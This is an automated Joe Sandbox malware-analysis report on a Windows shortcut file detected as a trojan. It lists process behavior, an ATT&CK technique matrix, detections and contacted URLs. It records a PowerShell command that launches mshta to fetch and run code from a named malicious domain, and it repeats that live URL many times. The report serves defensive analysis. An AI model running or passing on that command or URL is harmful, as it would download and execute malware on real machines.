Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1713Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 976Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1090Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 633Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep count: 1090 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep count: 633 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8084Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@v
Source: mshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2910157594.000001AC2A627000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2911686784.000001AC2FC58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.2909564054.0000028034AF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnr
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581246 Sample: K9esyY0r4G.lnk Startdate: 27/12/2024 Architecture: WINDOWS Score: 88 28 nextgencoding.cyou 2->28 34 Antivirus detection for URL or domain 2->34 36 Windows shortcut file (LNK) starts blacklisted processes 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 4 other signatures 2->40 9 WMIC.exe 1 2->9         started        12 svchost.exe 1 1 2->12         started        signatures3 process4 dnsIp5 44 Contains functionality to create processes via WMI 9->44 46 Creates processes via WMI 9->46 15 powershell.exe 7 9->15         started        18 conhost.exe 1 9->18         started        32 127.0.0.1 unknown unknown 12->32 signatures6 process7 signatures8 48 Windows shortcut file (LNK) starts blacklisted processes 15->48 20 powershell.exe 7 15->20         started        23 conhost.exe 15->23         started        process9 signatures10 42 Windows shortcut file (LNK) starts blacklisted processes 20->42 25 mshta.exe 18 20->25         started        process11 dnsIp12 30 nextgencoding.cyou 104.21.67.124, 443, 49730, 49731 CLOUDFLARENETUS United States 25->30

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
K9esyY0r4G.lnk36%VirustotalBrowse
K9esyY0r4G.lnk21%ReversingLabsWin32.Trojan.Pantera

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://nextgencoding.cyou/asd/amber3p0%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssD0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3L&0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3les/cf.errors.css0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3m0%Avira URL Cloudsafe
https://nextgencoding.cyou/0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3q0%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637L0%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637G0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3C:0%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/phish-bypass0170%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637U0%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssH0%Avira URL Cloudsafe
https://nextgencoding.cyou/F0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3100%Avira URL Cloudmalware
https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssQ0%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/phish-bypassN1%0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3...100%Avira URL Cloudmalware
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?13767556370%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3g0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3MS0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3H0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3_10%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637r3_0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3$global:?0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3ntional0%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.css0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3Hi00%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/phish-bypassv1m0%Avira URL Cloudsafe
https://nextgencoding.cyou/asd/amber3https://nextgencoding.cyou/asd/amber30%Avira URL Cloudsafe
http://go.microsoft.ctain0%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/phish-bypass0%Avira URL Cloudsafe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637...;0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
nextgencoding.cyou
104.21.67.124
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://nextgencoding.cyou/asd/amber3true
    • Avira URL Cloud: malware
    		unknown
    https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637false
    • Avira URL Cloud: safe
    		unknown
    https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://www.cloudflare.com/learning/access-management/phishing-attack/mshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2911705915.000002883779F000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637Lmshta.exe, 00000005.00000002.2911705915.0000028837700000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://www.cloudflare.com/learning/access-management/phishing-attack/o-1mshta.exe, 00000005.00000002.2911705915.000002883779F000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637Gmshta.exe, 00000005.00000002.2911705915.000002883779F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.cloudflare.com/5xx-error-landingwsmshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://nextgencoding.cyou/mshta.exe, 00000005.00000002.2909564054.0000028034B3C000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://nextgencoding.cyou/asd/amber3L&powershell.exe, 00000004.00000002.1684098929.00000200268D0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssDmshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://g.live.com/odclientsettings/ProdV2.C:edb.log.6.drfalse
            		high
            https://nextgencoding.cyou/asd/amber3les/cf.errors.cssmshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://nextgencoding.cyou/asd/amber3qmshta.exe, 00000005.00000002.2909564054.0000028034A99000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://nextgencoding.cyou/asd/amber3ppowershell.exe, 00000004.00000002.1684475946.0000020026DB1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://nextgencoding.cyou/asd/amber3C:mshta.exe, 00000005.00000002.2909564054.0000028034A80000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://nextgencoding.cyou/asd/amber3mmshta.exe, 00000005.00000002.2909564054.0000028034A80000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://nextgencoding.cyou/cdn-cgi/phish-bypass017mshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637Umshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://nextgencoding.cyou/Fmshta.exe, 00000005.00000002.2909564054.0000028034B3C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://nextgencoding.cyou/asd/amber3...mshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            https://nextgencoding.cyou/cdn-cgi/phish-bypassN1%mshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://g.live.com/odclientsettings/Prod.C:edb.log.6.drfalse
              		high
              https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssQmshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://g.live.com/odclientsettings/ProdV2edb.log.6.drfalse
                		high
                https://www.cloudflare.com/learning/access-management/phishing-attack/37mshta.exe, 00000005.00000002.2911705915.000002883779F000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://nextgencoding.cyou/asd/amber3gmshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssHmshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssdmshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://nextgencoding.cyou/asd/amber3Ppowershell.exe, 00000004.00000002.1684475946.000002002725D000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1684475946.0000020026DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000006.00000003.1730371809.000001AC2FB62000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                          		high
                          https://www.cloudflare.com/learning/access-management/phishing-attack/Hmshta.exe, 00000005.00000002.2909564054.0000028034AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://nextgencoding.cyou/asd/amber3MSpowershell.exe, 00000004.00000002.1683782941.0000020024FF0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://nextgencoding.cyou/asd/amber3_1mshta.exe, 00000005.00000002.2909564054.0000028034ABD000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://nextgencoding.cyou/asd/amber3Hmshta.exe, 00000005.00000002.2909933793.0000028034CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://nextgencoding.cyou/asd/amber3$global:?powershell.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.ver)svchost.exe, 00000006.00000002.2911515466.000001AC2FC00000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://nextgencoding.cyou/asd/amber3https://nextgencoding.cyou/asd/amber3mshta.exe, 00000005.00000002.2912572617.0000028837915000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://nextgencoding.cyou/asd/amber3Hi0mshta.exe, 00000005.00000002.2910364312.00000288369E0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637r3_mshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.cloudflare.com/5xx-error-landingmshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://nextgencoding.cyou/cdn-cgi/phish-bypassv1mmshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000006.00000003.1730371809.000001AC2FB62000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drfalse
                                  		high
                                  https://nextgencoding.cyou/asd/amber3ntionalmshta.exe, 00000005.00000002.2909564054.0000028034AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://go.microsoft.cpowershell.exe, 00000004.00000002.1683435643.0000020024E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://go.microsoft.ctainpowershell.exe, 00000004.00000002.1683435643.0000020024E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000004.00000002.1684475946.0000020026E0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1684475946.0000020026DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/mshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://nextgencoding.cyou/cdn-cgi/phish-bypassmshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637...;mshta.exe, 00000005.00000002.2911705915.00000288377CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.21.67.124
                                        		nextgencoding.cyouUnited States
                                        		13335CLOUDFLARENETUStrue

                                        Private

                                        IP
                                        127.0.0.1

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1581246
                                        Start date and time:2024-12-27 09:02:50 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 4m 49s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:11
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
